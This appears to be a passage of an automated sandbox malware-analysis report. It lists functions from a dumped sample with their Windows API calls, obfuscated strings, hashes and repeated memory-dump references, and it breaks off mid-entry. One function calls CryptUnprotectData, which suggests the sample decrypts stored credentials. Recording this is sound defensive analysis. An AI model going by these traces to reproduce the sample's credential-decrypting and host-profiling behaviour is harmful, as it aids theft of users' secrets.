                              • Opcode Fuzzy Hash: 3ca256cdd6e117dcaa4f7a09e0f69f2d9f6233c2742ab8fd37cf4ab8c1545f25
                              • Instruction Fuzzy Hash: C811F870214208EFDF05DF54E894BAB33A9AF89314F10854AFA19CB350D779ED42CBA9
                              Function 004D7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004E0DE8,00000000,?), ref: 004D7B40
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7B47
                              • GetLocalTime.KERNEL32(?,?,?,?,?,004E0DE8,00000000,?), ref: 004D7B54
                              • wsprintfA.USER32 ref: 004D7B83
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: ac2de3208c03c68726e4274c65b2f85e7d304477dcb8141e44e29f9c8c146831
                              • Instruction ID: 70a211a6e21b21a1d2ab73415566b026fbf1c3eba31402ebd0993a01ddd1fadd
                              • Opcode Fuzzy Hash: ac2de3208c03c68726e4274c65b2f85e7d304477dcb8141e44e29f9c8c146831
                              • Instruction Fuzzy Hash: D9112AB2918118ABCB14DBC9DD45BBEB7B8FB4CB11F10815BF605A2280E27D5940C7B4
                              Function 004D7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,012AE428,00000000,?,004E0DF8,00000000,?,00000000,00000000), ref: 004D7BF3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7BFA
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,012AE428,00000000,?,004E0DF8,00000000,?,00000000,00000000,?), ref: 004D7C0D
                              • wsprintfA.USER32 ref: 004D7C47
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 0f9d16e2796be1d39bbafac992f627bd4c3404d89bb0fe3c472455611b1af2b1
                              • Instruction ID: a559dfd221985b21434eda6e694cd536dbbf05b6e2e5b9148ab3f10dff044ce4
                              • Opcode Fuzzy Hash: 0f9d16e2796be1d39bbafac992f627bd4c3404d89bb0fe3c472455611b1af2b1
                              • Instruction Fuzzy Hash: F511ACB0919218EFEB248B54DC45FA9B778FB00711F104297F61993380D7781A40CB59
                              Function 0091B6D2 Relevance: 5.3, Strings: 3, Instructions: 1550COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'h|j$U_$iwo
                              • API String ID: 0-979665361
                              • Opcode ID: 4c4f0b108bf90c54542fd51e9f2e640d04c2f847a56a598a363cbb7f791e612f
                              • Instruction ID: 003c91e1a139c122582e48c8b886ed8f15b295b37b65de270dd5932c26c30e7a
                              • Opcode Fuzzy Hash: 4c4f0b108bf90c54542fd51e9f2e640d04c2f847a56a598a363cbb7f791e612f
                              • Instruction Fuzzy Hash: 87A205F3A0C2149FD3046E2DEC8567ABBE9EF94720F1A493DEAC4D7740EA3558048697
                              Function 00920746 Relevance: 5.3, Strings: 3, Instructions: 1544COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #k^y$Zj;?$Do}
                              • API String ID: 0-842040153
                              • Opcode ID: 34ac25931d0d022f341974352772781c6b94f2def1e04a5f56a49cc1f3b36aec
                              • Instruction ID: 5d6d559d4af7794bf9c7e405d52f9472cb8da84d1fd8ab0fc8976137d127ab46
                              • Opcode Fuzzy Hash: 34ac25931d0d022f341974352772781c6b94f2def1e04a5f56a49cc1f3b36aec
                              • Instruction Fuzzy Hash: A4A2F5F39082049FE7046E2DEC8567AFBE9EF94720F1A493DEAC4C3744E63599448693
                              Function 004D3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(004DE120,00000000,00000001,004DE110,00000000), ref: 004D39A8
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004D3A00
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: dfdd6e4ce56303ef517ade1aabb8270ec9821e30b2e1fefcb34fbb860dba2594
                              • Instruction ID: 320b3292787a1ec5bd8984f5cfe7d7a0ecb689da1a151bfe2a5d3ee63c8b8ae8
                              • Opcode Fuzzy Hash: dfdd6e4ce56303ef517ade1aabb8270ec9821e30b2e1fefcb34fbb860dba2594
                              • Instruction Fuzzy Hash: 3D410970A40A189FDB24DF58CC95F9BB7B4BB48302F4081DAE608EB290D7B56E85CF54
                              Function 004CA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004CA2D4
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004CA2F3
                              • LocalFree.KERNEL32(?), ref: 004CA323
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 4998f7166c47e8af49bf6082a8889a05c5b3572bef64302a11b64a43f8264e9c
                              • Instruction ID: c4ffb2cf5291b7534ce58d1cc6e350c68f3d2bb2b617e2765594546270a8d509
                              • Opcode Fuzzy Hash: 4998f7166c47e8af49bf6082a8889a05c5b3572bef64302a11b64a43f8264e9c
                              • Instruction Fuzzy Hash: 0811E8B8A00209DFCB04DFA4D884AAEB7B5FB88300F108559ED1597350D734AE51CB65
                              Function 00534BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?$__ZN
                              • API String ID: 0-1427190319
                              • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction ID: fae67c8cbd00298a82c96578366560efe4c9160d4128d30e15dc0adf3e3ffa54
                              • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction Fuzzy Hash: 307202B2908B519BD714CE24C89066ABFE2FFC5310F598A1DF9E55B291E370EC41DB82
                              Function 008F59A6 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3]O\$r&_
                              • API String ID: 0-1283433572
                              • Opcode ID: eddfe8c35a4d101841dbe3b62ba0d1fda5344be681d57acbb37923ca595bab90
                              • Instruction ID: ce7b41104dd12fb0885df76d63f8313482c206133f340759d54e74b8ede6a707
                              • Opcode Fuzzy Hash: eddfe8c35a4d101841dbe3b62ba0d1fda5344be681d57acbb37923ca595bab90
                              • Instruction Fuzzy Hash: 4D413AF3A093005BF7082D3DDD9577AB7D1EBD4320F1A813DDB8147788E97908014296
                              Function 00515DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: xn--
                              • API String ID: 0-2826155999
                              • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction ID: d6fd0f4dc0b55815afe74b91aa9d989d6e2066c03cfba384f516e0ebdb177b40
                              • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction Fuzzy Hash: 0BA200B1C042688AFF29CB68C8947EDBFB1BF49300F1842AAD4567B281D7759EC5CB51
                              Function 00514DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                              • Instruction ID: dc93503459663bde19ccbda6062dbd6553c00612acbf15aee3b7c981951f4eb7
                              • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                              • Instruction Fuzzy Hash: EEE1BF316083419FE725DE28C8817EEBBE6BFC9300F554A2DE5D997391E7319885CB82
                              Function 00514868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                              • Instruction ID: 82694097c304cf9f4b330dc49296db4d3e2666dcafe4890b426d6bce2c24e212
                              • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                              • Instruction Fuzzy Hash: 53E1A231A083059FEB24CE18C8917EEBBE6FFC5310F15992DE9999B251D730AC85CB46
                              Function 0052E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
